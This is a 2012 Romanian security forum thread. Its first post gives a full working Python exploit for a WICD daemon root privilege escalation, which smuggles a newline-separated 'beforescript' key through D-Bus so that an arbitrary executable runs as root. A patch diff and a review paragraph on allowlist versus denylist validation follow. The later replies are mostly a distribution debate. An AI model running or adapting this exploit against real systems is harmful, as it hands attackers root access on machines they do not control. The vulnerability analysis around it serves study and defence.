Guest expl0iter Posted April 11, 2012 Report Posted April 11, 2012 #!/usr/bin/python#wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.htmlimport sysimport osimport timeimport getopttry: from wicd import dbusmanagerexcept: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)class Error(Exception): def __init__(self, error): self.errorStr=error def __str__(self): return repr(self.errorStr)class Wicd(): wireless=None daemon=None versionString=None def __init__(self): try: dbusmanager.connect_to_dbus() dbusInterfaces = dbusmanager.get_dbus_ifaces() self.wireless = dbusInterfaces["wireless"] self.daemon = dbusInterfaces["daemon"] except: raise Error("Daemon is not running") self.versionString = self.daemon.Hello() def versionLessThan(self, version): if int(self.versionString.replace(".",""))<=version: return True else: return Falseclass Exploit(): def __init__(self, wicd, scriptPath): self.wicd = wicd self.scriptPath = scriptPath def getNets(self): self.wicd.wireless.Scan(True) nets = self.wicd.wireless.GetNumberOfNetworks() while nets < 1: self.wicd.wireless.Scan(True) nets = self.wicd.wireless.GetNumberOfNetworks() for net in range(nets): yield net def exploit(self): for net in self.getNets(): pass # Priming scan. try: self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true") except: raise Error("Unable to exploit (SetWirelessProperty() failed.)") try: self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted") except: raise Error("Unable to exploit (SetWirelessProperty() failed.)") propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property vulnIdentifier = self.wicd.wireless.GetWirelessProperty(0, propertyKey) # TODO: Does this need a try construct? 
self.wicd.wireless.ReloadConfig() for net in self.getNets(): # Implicit, but required re-scan. if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier: self.wicd.wireless.ConnectWireless(net) return True raise Error("Unable to exploit (Lost the network we were using)")def usage(): print "[!] Usage:" print " ( -h, --help ):" print " Print this message." print " ( --scriptPath= ): Required, executable to run as root." print " --scriptPath=/some/path/to/executable.sh"def main(): print "[$] WICD =< 1.7.0Day" try: opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="]) except getopt.GetoptError, err: # Print help information and exit: print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized" usage() sys.exit(0) scriptPath=None for opt, arg in opts: if opt in ("-h", "--help"): usage() sys.exit(0) elif opt =="--scriptPath": scriptPath=arg else: # I would be assuming to say we'll never get here. print "[!] Parameter error." usage() sys.exit(0) if not scriptPath: print "[!] Parameter error: scriptPath not set." usage() sys.exit(0) try: wicd = Wicd() except Error as error: print "[!] WICD Error: %s" % (error.errorStr) exit(0) print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString) if not wicd.versionLessThan(171): print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow." exploit = Exploit(wicd, scriptPath) print "[*] Attempting to exploit:" try: exploit.exploit() except Error as error: print "[!] 
Exploit Error: %s" % (error.errorStr) exit(0) print "[*] Exploit appears to have worked."# Standard boilerplate to call the main() function to begin# the program.if __name__=='__main__': main()==========================================PATCH:
- --- _wicd-daemon.py 2012-04-09 16:31:19.000000000 -0400
+++ wicd-daemon.py 2012-02-02 11:38:26.000000000 -0500
@@ -945,30 +945,6 @@
 self._scanning = False
 self.LastScan = []
 self.config = ConfigManager(wireless_conf, debug=debug)
- -
- - #Using a dict to avoid repitition.
- - self._validProperties = {
- - 'bssid':None,
- - "essid":None,
- - "hidden":None,
- - "channel":None,
- - "mode":None,
- - "enctype":None,
- - "encryption_method":None,
- - "key":None,
- - "automatic":None,
- - "ip":None,
- - "netmask":None,
- - "broadcast":None,
- - "gateway":None,
- - "use_static_dns":None,
- - "use_global_dns":None,
- - "dns1":None,
- - "dns2":None,
- - "dns3":None,
- - "use_settings_globally":None,
- - "has_profile":None
- -}
 def get_debug_mode(self):
 return self._debug_mode
@@ -1088,7 +1064,7 @@
 def SetWirelessProperty(self, netid, prop, value):
 """ Sets property to value in network specified. """
 # We don't write script settings here.
- - if (prop.strip() not in self._validProperties):
+ if (prop.strip()).endswith("script"):
 print "Setting script properties through the daemon is not" \
 + " permitted."
 return False
Quote
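Review bot: The `+` line of the second hunk, `if (prop.strip()).endswith("script"):`, is a suffix denylist, and `strip()` only trims leading and trailing whitespace, so a key containing an embedded line break whose final segment does not end in "script" passes the check — the proof-of-concept above this patch submits exactly such a key and then persists it through SaveWirelessNetworkProperty. The `-` line, `if (prop.strip() not in self._validProperties):`, is the right control: membership in a closed set of known keys rejects anything unrecognised rather than one recognisable suffix, so the allowlist should be kept and the suffix test dropped. Note that the headers date `---` to 2012-04-09 and `+++` to 2012-02-02 and the allowlist sits on the `-` side, so this diff reads fixed-to-vulnerable and must be applied with the sides swapped. The enclosing method of the first hunk and `SetWirelessProperty` both extend beyond their hunks, so whether any other write path validates keys cannot be judged from here.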
SirGod Posted April 11, 2012 Report Posted April 11, 2012 http://www.backtrack-linux.org/forums/showthread.php?t=49411 Cititi ce zice muts. Quote
pr00f Posted April 11, 2012 Report Posted April 11, 2012 Să-l ia naiba de RC2, nu-i merge conectarea la wireless pe adrese protejate cu WEP. Quote
pyth0n3 Posted April 11, 2012 Report Posted April 11, 2012 Backtrack este destinat sa ruleze din LiveCD, nefiind un sistem operativ stabil pentru a fi instalat. Exista diverse alte sisteme operative care pot fi folosite pentru acest scop. Problem solved. Quote
co4ie Posted April 12, 2012 Report Posted April 12, 2012 Zice bine Muts ... Nu este de competenta echipei Backtrack sa faca/aplice un patch la un produs care nu este al lor ! Probabil exploitul pt Wicd este pentru toate distributiile dar a fost scos in fata doar pt ca este default in Backtrack ! @pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conexiunii la wifi (wep/wpa) eu nu am avut nici cea mai mica problema cu el ! Quote
Cheater Posted April 12, 2012 Report Posted April 12, 2012 Eh bt, are multe gauri, poate ne jucam la defcamp cu asta Quote
pyth0n3 Posted April 12, 2012 Report Posted April 12, 2012 (edited) @pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conexiunii la wifi (wep/wpa) eu nu am avut nici cea mai mica problema cu el ! Nu am zis ca nu functioneaza, dar nu e ceea ce pare sau cel putin de cand nu mai e Slackware , Backtrack == Ubuntu , vine numit backtrack doar pentru un suite de tool-uri pe care le-au pus deasupra. Au trecut de la Slackware la Ubuntu deoarece nu ar fi avut un mare succes avand in vedere faptul ca multi nu ar fi fost in grad sa instaleze un Slackware, in schimb ubuntu e foarte usor de instalat si oricare poate avea backtrack (asa creste numele). Avand in vedere faptul ca nu e facut ca sa fie folosit ca un sistem de baza e ok, atata timp cat il folosesti din LiveCD. Evident se poate instala dar nu e definit ca un sistem de baza. As fi preferat slackware, de aceea eu nu folosesc backtrack (Asta e parerea mea) Edited April 12, 2012 by pyth0n3 Quote
vladimir Posted April 12, 2012 Report Posted April 12, 2012 pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume, de back track 5.r2 sau precum e fedora sau mandrila, si asa mai departe,ca e vorba de reclama, folositi ubuntu, e si mai bun ca back track, ceea ce ai in back track poti pune in ubuntu.in plus back track, nu numai live cd, si instalat bine facuta bine partitia, dupa aia ruleaza bine, dar eu tot raman cu ubuntu. Quote
co4ie Posted April 12, 2012 Report Posted April 12, 2012 (edited) @vladimir: Vorbesti aiurea ... Backtrack este 95% Ubuntu si "vine numit backtrack doar pentru suitele de tool-uri instalate " dupa cum a precizat Pythone ! BTW se numeste Mandriva ... Si nu poti spune ca Ubuntu este cea mai buna distributie doar pentru ca iti place tie sau ca toti copiii pot da clickuri si cred ei ca stiu linux ! Intr-adevar Ubuntu are parte de cel mai bun suport la ora actuala dar daca ai probleme in loc sa incerci sa le rezolvi fugi repede la nenea gogu si dai copy/paste de pe forumuri !! Cea mai buna distributie este cea cu care lucrezi tu personal cel mai bine .. Si asta o sa iti spuna orice sysadmin cat de cat competent ! @pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ... Cel mai probabil alegerea lor a fost facuta pentru popularitatea distributiei si pentru ca 99% din persoanele care stiu sa lucreze in astfel de medii se simt cat de cat confortabil cu Ubuntu ! Edited April 12, 2012 by co4ie Quote
pyth0n3 Posted April 12, 2012 Report Posted April 12, 2012 (edited) pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume, Singurele distro Linux despre care putem vorbi si pune in confrunt intre ele sunt: Debian, RedHat, Slackware, Suse; restul sunt doar derivate. Ubuntu e un derivat si nu il voi pune in confrunt cu nici una din distributiile de mai sus. Eu cand voi vorbi de Linux ma voi referi doar la 4 distributii iar cand ma voi referi la derivate voi specifica cine este tatal. @pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ... In privinta asta nu am nici un dubiu, ma refeream la final users. Sunt mai multi fani Ubuntu si e mai usor, de aceea au ales ca suit-ul de tool-uri sa fie in ubuntu. Eu as fi preferat sa ramana o distributie pura ca Slackware. (Asta e doar una din parerile mele) Ei au facut ceea ce au crezut mai bine pentru final users. Oricum e destinat pentru pentesting LiveCD dar poate fi si instalat, evident. Edited April 12, 2012 by pyth0n3 Quote
Nytro Posted April 12, 2012 Report Posted April 12, 2012 https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/ Quote
backdoor Posted April 18, 2012 Report Posted April 18, 2012 Interesanta descoperire. Pt cei care stiu cu ce se mananca backtrack : cum te conectezi la un backtrack prin retea cand singurul serviciu este postgresql cu bind 127.0.0.1 ? Cat despre discutia offtopic de mai sus: Ce conteaza pe ce OS au pus utilitarele ? Probabil ca au ales uBuntu tocmai pt ca kernelul e compilat cu full support pentru cam tot ce misca networking/video/sound . Quote